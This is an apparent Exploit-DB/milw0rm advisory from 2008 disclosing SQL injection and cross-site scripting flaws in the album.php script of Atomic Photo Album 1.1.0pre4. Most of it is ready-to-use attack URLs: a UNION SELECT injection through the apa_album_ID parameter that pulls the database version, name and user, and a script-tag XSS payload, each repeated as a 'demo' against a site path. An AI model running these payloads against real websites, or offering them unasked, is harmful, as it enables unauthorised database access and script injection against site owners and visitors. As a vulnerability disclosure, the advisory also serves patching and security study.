Atomic Photo Album 1.1.0pre4 - Cross-Site Scripting / SQL Injection

EDB-ID:

6572

Author:

d3v1l

Type:

webapps

Platform:

PHP

Published:

2008-09-25

[~]-----------------------------------------------------------------------
[~] Atomic Photo Album 1.1.0pre4 [album.php] - Multiple Remote Vulnerabilities
[~]
[~] http://atomicpa.sourceforge.net
[~] ----------------------------------------------------------
[~] Bug founded by d3v1l
[~]
[~] Date: 25.09.2008
[~]
[~]
[~] d3v1l@spoofer.com
[~]
[~] -----------------------------------------------------------
[~] Greetz tO ALL:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~]
[~] Pentest| Gibon| Pig       AND      milw0rm staff
[~]-------------------------------------------------------------
[~] Exploit :- SQL Injection
[~]
[~] http://site.com/album.php?apa_album_ID=1 UNION SELECT concat_ws(0x3a,version(),database(),user())/*
[~]
[~] Demo :-
[~]
[~] http://www.site.com/new/fotos/album.php?apa_album_ID=1 UNION SELECT concat_ws(0x3a,version(),database(),user())/*
[~]
[~]---------------------------------------------------------------------------------------------------------------------------
[~]
[~] Exploit :- XSS (cross site scripting)
[~]
[~] http://site.com/album.php?apa_album_ID=>'><script>alert(1337)</script>.
[~]
[~] Demo :-
[~]
[~] http://www.site.com/new/fotos/album.php?apa_album_ID=>'><script>alert(1337)</script>.
[~]
[~]----------------------------------------------------------------------------------------------------------------------------

# milw0rm.com [2008-09-25]